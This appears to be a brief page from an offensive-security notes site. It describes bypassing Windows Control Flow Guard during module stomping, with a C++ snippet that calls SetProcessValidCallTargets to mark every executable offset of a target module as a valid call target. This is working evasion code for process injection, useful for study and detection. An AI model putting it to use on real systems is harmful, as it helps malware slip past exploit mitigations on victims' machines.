TwitterGitHubBlogSponsor

CFG

Control Flow Guard

CFG Bypasses for Module Stomping

Patch

Mark as Valid (SetProcessValidCallTargets)

Mark everything in the target module as valid:

void markCFGValid(unsigned long long ptrToMarkValid)
{
    CFG_CALL_TARGET_INFO info;
    info.Flags = CFG_CALL_TARGET_VALID;
    info.Offset = ptrToMarkValid;

    if (!SetProcessValidCallTargets_(targetProcess, targetModuleBase, sizeOfImage, 1, &info))
        throw std::exception("SetProcessValidCallTargets failed");
}

if (srcSect.Characteristics & IMAGE_SCN_MEM_EXECUTE)
    for (unsigned int n = 0; n < srcSect.VirtualSize; n += 16)
        targetModule.markCFGValid(n);

Last updated